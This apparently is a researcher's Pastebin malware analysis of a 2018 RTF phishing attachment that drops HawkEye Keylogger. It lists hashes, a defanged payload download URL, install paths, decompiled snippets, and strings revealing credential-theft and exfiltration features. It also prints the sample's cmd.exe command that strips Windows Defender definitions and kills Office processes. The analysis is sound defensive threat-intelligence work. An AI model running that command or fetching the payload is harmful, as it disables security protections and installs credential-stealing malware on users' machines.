Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- found by @neonprimetime security
- #rtf
- 6/5/2018 email subject "R.F.Q. for the contract project procurement exercise ..."
- 7f51124e0d15008cacd0a407d2ca9bf8
- https://www.hybrid-analysis.com/sample/4eb5a28d72f55c6e8d4d80c650547266e6c9aa0b2a73f9253f3cc2a61010886f?environmentId=100
- https://app.any.run/tasks/0b2f956d-d4a9-4672-98c3-c2c27cf1d718
- opens excel
- downloads
- hxxp://stemtopx.com/work/new/14.exe
- 46B255CB008D99DA1D0FE1EB51006A6A
- copies itself to and runs from
- C:\Users\Win732\AppData\Roaming\Microsoft\Windows\DsvHelper\filename.exe
- also seen
- C:\Users\Public\Host32.exe
- EBDC467745BFCD089E1337D79A5AB422
- runs this command
- "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit
- ----------
- 14.exe is .NET dll so can see
- WindowsApplication1.Shutdown_manager
- public static byte[] FJaioefgkaoeK(byte[] Data)
- {
- ....
- MyProject.Forms.Form1.TrackBar1.Value = Conversions.ToInteger(MyProject.Forms.Shutdown_manager.INI_ReadValueFromFile("Startseite", "Url", "", ".\\Configurations datei.ini"));
- MyProject.Forms.Shutdown_manager.Herunterfahren.Stop();
- MyProject.Forms.Shutdown_manager.Neustarten.Stop();
- Interaction.MsgBox("Bitte geben sie eine zeit an!", MsgBoxStyle.Exclamation, "Countdown Konnte nicht eingeleitet werden!");
- ....
- }
- --------
- interesting in-memory strings
- --------
- 0x29f1c93 (17): ConfuserEx v1.0.0
- 0x29f22c0 (104): HawkEye Keylogger - Reborn v8 - {0} Logs - {1} \ {2}
- 0x29f2329 (122): HawkEye Keylogger - Reborn v8{0}{1} Logs{0}{2} \ {3}{0}{0}{4}
- 0x29f244f (52): http://pomf.cat/upload.php
- 0x29f2484 (38): https://a.pomf.cat/
- 0x29f29d7 (26): passwordfile
- 0x2b381b0 (14): _EmailUsername
- 0x2b381bf (14): _EmailPassword
- 0x2b381ce (12): _EmailServer
- 0x2b381db (10): _EmailPort
- 0x2b381f0 (10): _FTPServer
- 0x2b381fb (12): _FTPUsername
- 0x2b38208 (12): _FTPPassword
- 0x2b38231 (12): _ProxySecret
- 0x2b38248 (12): _PanelSecret
- 0x2b38255 (12): _LogInterval
- 0x2b38262 (16): _PasswordStealer
- 0x2b38273 (16): _KeyStrokeLogger
- 0x2b38284 (16): _ClipboardLogger
- 0x2b38295 (17): _ScreenshotLogger
- 0x2b382a7 (13): _WebCamLogger
- 0x2b382b5 (11): _SystemInfo
- 0x2b382ca (16): _InstallLocation
- 0x2b382db (14): _InstallFolder
- 0x2b382ea (16): _InstallFileName
- 0x2b382fb (15): _InstallStartup
- 0x2b3830b (26): _InstallStartupPersistance
- 0x2b38326 (15): _HistoryCleaner
- 0x2b38352 (10): _Disablers
- 0x2b3835d (19): _DisableTaskManager
- 0x2b38371 (21): _DisableCommandPrompt
- 0x2b38387 (15): _DisableRegEdit
- 0x2b38397 (18): _ProcessProtection
- 0x2b383aa (17): _ProcessElevation
- 0x2b383bc (16): _AntiVirusKiller
- 0x2b383cd (10): _BotKiller
- 0x2b383d8 (13): _AntiDebugger
- 0x2b383e6 (15): _ExecutionDelay
- 0x2b383f6 (16): _FakeMessageShow
- 0x2b38407 (17): _FakeMessageTitle
- 0x2b38419 (16): _FakeMessageText
- 0x2b3842a (16): _FakeMessageIcon
- 0x2b3843b (15): _WebsiteVisitor
- 0x2b3844b (22): _WebsiteVisitorVisible
- 0x2b38462 (20): _WebsiteVisitorSites
- 0x2b38477 (15): _WebsiteBlocker
- 0x2b38487 (20): _WebsiteBlockerSites
- 0x2b3849c (11): _FileBinder
- 0x2b384a8 (16): _FileBinderFiles
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement